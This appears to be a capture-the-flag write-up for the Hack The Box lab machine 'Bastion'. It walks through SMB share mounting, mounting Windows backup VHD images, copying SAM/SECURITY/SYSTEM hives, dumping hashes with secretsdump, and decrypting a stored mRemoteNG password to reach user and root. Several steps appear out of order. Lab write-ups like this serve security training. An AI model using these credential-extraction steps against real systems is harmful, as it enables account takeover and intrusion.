Hackthebox - Bastion
Last updated
Last updated
Windows
While investing SMB we can launch a gobuster scan on the open http ports gobuster dir -u http://10.10.10.134:47001/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt and gobuster dir -u http://10.10.10.134:5985/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Nothing here (as the foothold seems to be done through smb really)
Looking at the nmap SMB seems worth investigating
We finally are able to connect to a share this way:
Let's get the content. We can get everything in a row using this set of commands
We have to abort this the note says:
Big hint to investigate this backup folder
Let's just have a look around for now
Here is an article by Jake Binstein that is interesting to better understand the folder (Check out the Structure part in the end). That is a start.
We have an info about the name of the pc and a potential user L4mpje-PC
Looking further in the files we find vhd images. Here is an article by Samuel Whang on how to mount this type of files
Following Samuel Whang article, we first create a dir to mount the remote share sudo mkdir /mnt/remote
Note: I am going to sudo su for the rest of the process
Let's create a mount point for the first vhd file mkdir /mnt/vhd1
Let's now mount it with guestmount guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd1 -v
Let's do the same last step for the 2nd vhd file
mkdir /mnt/vhd2
guestmount --add /mnt/remote/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd2 -v
In my case it worked for the 2nd file only. I am going to inspect it and then trouble shot the 1st file in case (note: I realized later that one is a boot partition and the other the disk so that is why one of the image is useless for us)
Let's copy the SAM, Security and system files in my working directory cp SAM SECURITY SYSTEM ../../../../../home/kali/Documents/hackthebox/bastion
Let's try the password on ssh
Also we can not that according to the admin hash we see that it is not stored as an lm hash (blank or null)
Let's get winpeas in the target. Nothing really
PowerUp is more verbose. It seems to be dll hijack
I tried the techniques listed here, however with our current rights nothing works...
Let's go back to manual enum
In the programs this one is unusual mRemoteNG. We can have a look at the changelog to get the version that seems to be 1.76.11
After a google search we get this article. So this article turns used this same box as an example... it is a big spoil xD. But in a real context we would have looked in the configuration files anyway and google something like "decrypt mremoteng passwords" or something similar.
Indeed the file confCons.xml contains a password
We can follow step 3 of the article python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
sudo mount -t cifs //10.10.10.134/Backups /mnt/remote -o rw we can mount it. It works
We navigate where we have the vhd files
We can use secret dump on them and we get... secrets python3 /opt/impacket/examples/secretsdump.py local -sam SAM -security SECURITY -system SYSTEM
Let's try the password we just found on ssh ssh L4mpje@10.10.10.134 it works, we have a user shell
We can grab the user flag
We get the password
We can use it to connect in ssh and grab the root flag
